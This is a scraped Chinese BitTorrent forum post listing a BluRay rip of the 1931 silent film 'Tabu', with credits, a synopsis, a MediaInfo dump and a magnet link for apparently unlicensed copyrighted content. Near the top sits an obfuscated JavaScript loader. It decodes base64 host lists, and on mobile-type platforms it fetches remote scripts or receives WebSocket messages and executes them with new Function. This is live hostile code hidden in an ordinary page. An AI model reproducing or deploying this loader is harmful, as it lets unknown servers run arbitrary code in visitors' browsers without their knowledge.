禁忌[中文字幕].Tabu.A.Story.of.the.South.Seas.1931.1080p.BluRay.x265.10bit.FLAC.1.0 8.22GB

版主小s 25天前 474

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 禁忌 / 南国风光(港) / 禁脔 / Tabu
◎片  名 Tabu: A Story of the South Seas
◎年  代 1931
◎产  地 美国
◎类  别 剧情 / 爱情 / 冒险
◎语  言 毛利语
◎上映日期 1931-08-01
◎IMDb链接 https://www.imdb.com/title/tt0022458/
◎豆瓣评分 8.0/10 (1215人评价)
◎豆瓣链接 https://movie.douban.com/subject/1296577/
◎片  长 84 分钟
◎导  演 F·W·茂瑙 F.W. Murnau (id:1014143)
◎编  剧 F·W·茂瑙 F.W. Murnau (id:1014143)
       罗伯特·弗拉哈迪 Robert J. Flaherty (id:1004798)
       埃德加·G·乌默 Edgar G. Ulmer (id:1050379)
◎演  员 比尔·班布里奇 Bill Bambridge (id:1063521)
       Matahi Matahi (id:1346066)
       安妮·希瓦利埃 Anne Chevalier (id:1346067)
       Hitu Hitu (id:1346068)
       罗伯特·弗拉哈迪 Robert J. Flaherty (id:1004798)
       F·W·茂瑙 F.W. Murnau (id:1014143)
       W·弗兰克·哈尔林 W. Franke Harling (id:1017192)
       米兰·罗德尔 Milan Roder (id:1039562)
       雨果·里森菲尔德 Hugo Riesenfeld (id:1009223)
       弗洛伊德·克罗斯比 Floyd Crosby (id:1037801)
       罗伯特·弗拉哈迪 Robert J. Flaherty (id:1004798)
       比尔·班布里奇 Bill Bambridge (id:1063521)

◎标  签 默片 / 美国 / F.W.Murnau / 茂瑙 / 1931 / 爱情 / 1930s / 德国

◎简  介
  作为纪录电影大师弗拉哈迪的“毛利族三部曲”的最后一部(此前两部为《摩阿拿》和《南海白影》),影片讴歌了生死不渝的爱情,真实生动地反映了毛利人反对迷信和等级制度的斗争,有着鲜明的记录化风格,受到热烈欢迎。弗拉哈迪原著的本意是要拍一部表现毛利人社会生活的记录片,而茂瑙的不断修改则为其注入了更多的情节因素,招致弗拉哈迪的反对。在意见不合的情况下弗拉哈迪离开了摄制组,茂瑙不得不独立完成余下的工作。后来,弗拉哈迪也承认,在这部影片里,茂瑙有着更多的贡献。《禁忌》获第4届奥斯卡最佳摄影金像奖。                                       
                                    影片描写在南海上有个小岛,上面住着毛利人原始部落过着无忧无虑生活,部族依照当地信仰需要选举一位少女作为神供养(她将不能结婚),少女不愿过这种日子于是和未婚夫逃离了小岛,到了另一个岛生活,生活虽然艰难当时他们一直相亲相爱,直到部族首领(巫师)寻迹而至,少女不得不离开,他的未...

◎获奖情况 (共1项)
  第4届奥斯卡金像奖 (1931)
  最佳摄影
   └──弗洛伊德·克罗斯比 (id:1037801)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 108938067282491958266143251458875489562 (0x51F4B565E972A417207C5022837C7D1A)

  4. Complete name                            : Tabu.A.Stor[email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 8.21 GiB

  8. Duration                                 : 1 h 25 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 13.7 Mb/s

  11. Movie name                               : TABU

  12. Encoded date                             : UTC 2021-08-28 04:49:49

  13. Writing application                      : mkvmerge v60.0.0 ('Are We Copies?') 64-bit

  14. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4

  15. Cover                                    : Yes

  16. Attachments                              : cover.jpg


  17. Video

  18. ID                                       : 1

  19. Format                                   : HEVC

  20. Format/Info                              : High Efficiency Video Coding

  21. Format profile                           : Main [email protected]@Main

  22. Codec ID                                 : V_MPEGH/ISO/HEVC

  23. Duration                                 : 1 h 25 min

  24. Bit rate                                 : 13.1 Mb/s

  25. Width                                    : 1 218 pixels

  26. Height                                   : 1 080 pixels

  27. Display aspect ratio                     : 1.128

  28. Frame rate mode                          : Constant

  29. Frame rate                               : 23.976 (24000/1001/53354) FPS

  30. Color space                              : YUV

  31. Chroma subsampling                       : 4:2:0

  32. Bit depth                                : 10 bits

  33. Bits/(Pixel*Frame)                       : 0.415

  34. Stream size                              : 7.84 GiB (95%)

  35. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  36. Encoding settings                        : rc=crf / crf=20.5000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1218x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  37. Default                                  : Yes

  38. Forced                                   : No


  39. Audio

  40. ID                                       : 2

  41. Format                                   : FLAC

  42. Format/Info                              : Free Lossless Audio Codec

  43. Codec ID                                 : A_FLAC

  44. Duration                                 : 1 h 25 min

  45. Bit rate mode                            : Variable

  46. Bit rate                                 : 620 kb/s

  47. Channel(s)                               : 1 channel

  48. Channel layout                           : C

  49. Sampling rate                            : 48.0 kHz

  50. Frame rate                               : 11.719 FPS (4096 SPF)

  51. Bit depth                                : 24 bits

  52. Compression mode                         : Lossless

  53. Stream size                              : 380 MiB (5%)

  54. Writing library                          : libFLAC 1.2.1 (UTC 2007-09-17)

  55. Language                                 : English

  56. Default                                  : Yes

  57. Forced                                   : No


  58. Text #1

  59. ID                                       : 3

  60. ID in the original source medium         : 4608 (0x1200)

  61. Format                                   : PGS

  62. Muxing mode                              : zlib

  63. Codec ID                                 : S_HDMV/PGS

  64. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration                                 : 1 h 23 min

  66. Bit rate                                 : 2 689 b/s

  67. Count of elements                        : 120

  68. Stream size                              : 1.62 MiB (0%)

  69. Title                                    : chs

  70. Language                                 : Chinese

  71. Default                                  : Yes

  72. Forced                                   : No

  73. Original source medium                   : Blu-ray


  74. Text #2

  75. ID                                       : 4

  76. ID in the original source medium         : 4609 (0x1201)

  77. Format                                   : PGS

  78. Muxing mode                              : zlib

  79. Codec ID                                 : S_HDMV/PGS

  80. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration                                 : 1 h 23 min

  82. Bit rate                                 : 2 713 b/s

  83. Count of elements                        : 120

  84. Stream size                              : 1.63 MiB (0%)

  85. Title                                    : cht

  86. Language                                 : Chinese

  87. Default                                  : No

  88. Forced                                   : No

  89. Original source medium                   : Blu-ray


  90. Menu

  91. 00:00:00.000                             : Chapter 01

  92. 00:05:19.694                             : Chapter 02

  93. 00:09:27.525                             : Chapter 03

  94. 00:16:12.888                             : Chapter 04

  95. 00:21:02.135                             : Chapter 05

  96. 00:29:38.067                             : Chapter 06

  97. 00:34:24.729                             : Chapter 07

  98. 00:38:47.742                             : Chapter 08

  99. 00:45:14.211                             : Chapter 09

  100. 00:50:48.295                             : Chapter 10

  101. 00:55:24.029                             : Chapter 11

  102. 01:03:17.210                             : Chapter 12

  103. 01:08:26.769                             : Chapter 13

  104. 01:15:12.966                             : Chapter 14



TAGS 冒险 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:9A72E4AAF5D4ACF291DB89F595112C806A4FDFAB
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回